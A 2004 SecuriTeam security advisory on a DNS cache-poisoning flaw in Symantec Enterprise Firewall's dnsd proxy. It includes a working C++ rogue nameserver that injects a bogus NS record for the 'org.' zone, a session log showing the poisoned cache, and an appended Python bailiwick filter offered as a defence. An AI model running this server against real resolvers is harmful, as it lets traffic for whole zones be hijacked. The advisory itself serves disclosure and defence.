[UNIX] Symantec Enterprise Firewall DNSD Cache Poisoning Vulnerability


Date: 21 Jun 2004 11:59:42 +0200
From: SecuriTeam <support@securiteam.com>
To: [email protected]
Subject: [UNIX] Symantec Enterprise Firewall DNSD Cache Poisoning Vulnerability

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com




  Symantec Enterprise Firewall DNSD Cache Poisoning Vulnerability
------------------------------------------------------------------------


SUMMARY

 
Symantec Enterprise Firewall (<http://enterprisesecurity.symantec.com/products/products.cfm?ProductID=47>), designed to provide proactive, enterprise-class network and application-level protection, enables fast and secure connectivity with the Internet.

The Symantec Enterprise Firewall dnsd proxy is vulnerable to cache poisoning 
by an attacker who operates a nameserver it consults while resolving a query.

DETAILS

Vulnerable Systems:
 * Symantec Enterprise Firewall dnsd proxy, versions 8 and earlier

It is possible to inject false entries into the server's cache and make a 
rogue DNS server appear to be authoritative for a zone it does not control. 
Once this information is loaded into the cache, any request for a subdomain 
of that zone will be sent to the rogue DNS server. To achieve this, a 
malicious DNS server responds to a query (not necessarily with an answer in 
the answer section) and fills the authority and additional sections of the 
DNS response with records that are unrelated to the question. The SEF dnsd 
proxy accepts this response and performs none of the checks needed to 
establish that the information is correct or even related to the answer 
(i.e., that the responding server had authority over those records; the 
so-called bailiwick check).

fryxar has found that some public DNS servers use this vulnerability to 
redirect unregistered domains to their own sites. It could also be used for 
Man-in-the-Middle, Denial of Service and Social Engineering attacks. 

Vendor Status:
Symantec's response as follows:
"Symantec engineers are reviewing the posted information.  If it is 
validated we will respond accordingly."

Proof of Concept Code:
Solaris 9 / SEF 8 and SEF 7.0.4: On an authoritative nameserver (e.g. a host 
using afraid.org dynamic DNS, which supports NS delegation of a subdomain), 
compile and run the following small DNS server:

// PoC poisoning cache attack SEF 8 and later (by fryxar)
// Requires poslib 1.0.4 library
// Compile: g++ `poslib-config --libs --cflags --server` poc.cpp -o poc

#define POS_DEFAULTLOG
#define POS_DEFAULTLOG_STDERR
#define POS_DEFAULTLOG_SYSLOG

// Server include file
#include <poslib/server/server.h>

// For printf and signal handling
#include <stdio.h>
#include <stdlib.h>
#include <signal.h>

// Domain this server is legitimately authoritative for (from argv[1])
char *dyndomain;

DnsMessage *my_handle_query(pending_query *query);

void cleanup(int sig) {
  // close down the server system
  pos_setquitflag();
}

int main(int argc, char **argv) {
  _addr a;
  try {
    /* get command-line arguments */
    if (argc != 2) {
      printf("Usage: %s [domainname]\n", argv[0]);
      return 1;
    } else {
      dyndomain = argv[1];
      txt_to_addr(&a, "any");   // listen on all interfaces
    }

    poslib_config_init();

    /* bring up posadis */
    servers.push_front(ServerSocket(ss_udp, udpcreateserver(&a)));

    // use the posadis logging system
    pos_log(context_none, log_info, "Proof of concept DNS server starting up...");

    // set signal handlers
    signal(SIGINT, cleanup);
    signal(SIGTERM, cleanup);

    // set query function
    handle_query = my_handle_query;

    // run server
    posserver_run();
  } catch (PException p) {
    printf("Fatal exception: %s\n", p.message);
    return 1;
  }

  return 0;
}

/* the entry function which will handle all queries */
DnsMessage *my_handle_query(pending_query *query) {
  DnsMessage *a = new DnsMessage();
  DnsQuestion q;
  DnsRR rr;

  /* set a as an answer to the query */
  a->ID = query->message->ID;
  a->RD = query->message->RD;
  a->RA = false;

  if (query->message->questions.begin() == query->message->questions.end()) {
    /* query did not contain question */
    a->RCODE = RCODE_QUERYERR;
    return a;
  }
  q = *query->message->questions.begin();
  a->questions.push_back(q);
  a->QR = true;

  pos_log(context_server, log_info, "Query: [%s,%s]", q.QNAME.tocstr(),
          str_qtype(q.QTYPE).c_str());

  if (q.QTYPE == DNS_TYPE_A && q.QNAME == dyndomain) {
    /* answer section: an A record for the domain we really own */
    rr = DnsRR(dyndomain, DNS_TYPE_A, CLASS_IN, 3600);
    string data = rr_fromstring(DNS_TYPE_A, "200.200.200.200"); // Anything...
    rr.RDLENGTH = data.size();
    rr.RDATA = (char *)memdup(data.c_str(), data.size());
    a->answers.push_back(rr);

    /* authority section: an NS record for the parent zone "org", which this
       server has no authority over (out of bailiwick); this is what dnsd
       wrongly caches */
    rr = DnsRR("org", DNS_TYPE_NS, CLASS_IN, 3600);
    data = rr_fromstring(DNS_TYPE_NS, "fakedns.com");
    rr.RDLENGTH = data.size();
    rr.RDATA = (char *)memdup(data.c_str(), data.size());
    a->authority.push_back(rr);

    /* additional section: "glue" for the bogus nameserver, also out of
       bailiwick */
    rr = DnsRR("fakedns.com", DNS_TYPE_A, CLASS_IN, 3600);
    data = rr_fromstring(DNS_TYPE_A, "200.200.200.201"); // Anything...
    rr.RDLENGTH = data.size();
    rr.RDATA = (char *)memdup(data.c_str(), data.size());
    a->additional.push_back(rr);
  } else {
    /* we don't want this */
    a->RCODE = RCODE_SRVFAIL;
  }
  return a;
}

Example of an Exploit Session:
fryxar.afraid.org # ./poc fryxar.afraid.org

        and now, in your SEF Firewall: 


firewall # kill `ps -ef | awk '/[d]nsd/ { print $2 }'` # Cleaning the cache

firewall # nslookup afraid.org 127.0.0.1  # Caching org. NS
Server:  localhost
Address:  127.0.0.1

Non-authoritative answer:
Name:    afraid.org
Addresses:  69.42.89.56, 69.42.89.53, 69.42.89.55, 69.42.89.54

firewall # kill -USR1 `ps -ef | awk '/[d]nsd/ { print $2 }'` # dnsd dump

firewall # sed -n '/^org.$/,/^[^ ]/p' /usr/adm/sg/dnsd.dat # show cached "org." NS
org.
   172775      NS TLD2.ULTRADNS.NET.
   172775      NS TLD1.ULTRADNS.NET.
2.110.45.209.in-addr.jjc.com.pe.

firewall # nslookup fryxar.afraid.org 127.0.0.1 # Domain owned by my poisoned DNS
Server:  localhost
Address:  127.0.0.1

Non-authoritative answer:
Name:    fryxar.afraid.org
Address:  200.200.200.200

firewall # kill -USR1 `ps -ef | awk '/[d]nsd/ { print $2 }'` # dnsd dump

firewall # sed -n '/^org.$/,/^[^ ]/p' /usr/adm/sg/dnsd.dat # show cached "org." NS
org.
     3567      NS fakedns.com.           <- Ooohh!
     3567      NS TLD2.ULTRADNS.NET.
     3567      NS TLD1.ULTRADNS.NET.
2.110.45.209.in-addr.jjc.com.pe.

SEF now "thinks" that the fakedns.com server is an authoritative nameserver 
for the ".org" zone, an entry planted by the fryxar.afraid.org DNS server, 
which is authoritative only for the fryxar.afraid.org domain.
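The missing check, as an added example that is not part of the advisory or of any Symantec code: a bailiwick filter applied to the three records the PoC server above returns, given that the resolver reached that server through the delegation for fryxar.afraid.org. Records in the authority section are accepted only if their owner name lies at or below the zone the queried server was delegated for, and additional records only as glue for an NS record that survived that test (the ranking of RFC 2181 section 5.4.1 builds on the same idea). The LEGIT records and the 203.0.113.5 address are constructed values.

```python
from dataclasses import dataclass

@dataclass(frozen=True)
class RR:
    name: str      # owner name, e.g. "fryxar.afraid.org."
    rtype: str     # "A", "NS", ...
    rdata: str     # text form of the record data
    section: str   # "answer", "authority" or "additional"

def labels(name):
    """Split a domain name into lowercase labels; the root is []."""
    return [l for l in name.lower().rstrip(".").split(".") if l]

def in_bailiwick(name, zone):
    """True if name equals zone or lies below it (label-wise: 'evilorg.' is not in 'org.')."""
    n, z = labels(name), labels(zone)
    return len(n) >= len(z) and n[len(n) - len(z):] == z

def filter_response(zone, rrs):
    """Split rrs into (accepted, rejected). zone is the zone the queried
    server was delegated for (fryxar.afraid.org. for the PoC server)."""
    accepted, rejected = [], []
    # Pass 1: answer/authority records must be at or below the zone.
    for rr in rrs:
        if rr.section == "additional":
            continue
        (accepted if in_bailiwick(rr.name, zone) else rejected).append(rr)
    # Pass 2: additional records are only glue for an NS record that was
    # itself accepted, and must be in bailiwick too.
    ns_targets = {".".join(labels(rr.rdata)) for rr in accepted if rr.rtype == "NS"}
    for rr in rrs:
        if rr.section != "additional":
            continue
        ok = ".".join(labels(rr.name)) in ns_targets and in_bailiwick(rr.name, zone)
        (accepted if ok else rejected).append(rr)
    return accepted, rejected

# Constructed input: the three records the advisory's PoC server returns.
POISONED = [
    RR("fryxar.afraid.org.", "A", "200.200.200.200", "answer"),
    RR("org.", "NS", "fakedns.com.", "authority"),
    RR("fakedns.com.", "A", "200.200.200.201", "additional"),
]
# Constructed input: a legitimate in-zone delegation with its glue (made-up values).
LEGIT = [
    RR("fryxar.afraid.org.", "NS", "ns1.fryxar.afraid.org.", "authority"),
    RR("ns1.fryxar.afraid.org.", "A", "203.0.113.5", "additional"),
]
```

With this filter the "org. NS fakedns.com." entry and its glue are discarded, so only the A record for fryxar.afraid.org itself reaches the cache, while the LEGIT delegation and its glue are both accepted.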


ADDITIONAL INFORMATION

The information has been provided by fryxar <mailto:fryxar@datafull.com>.




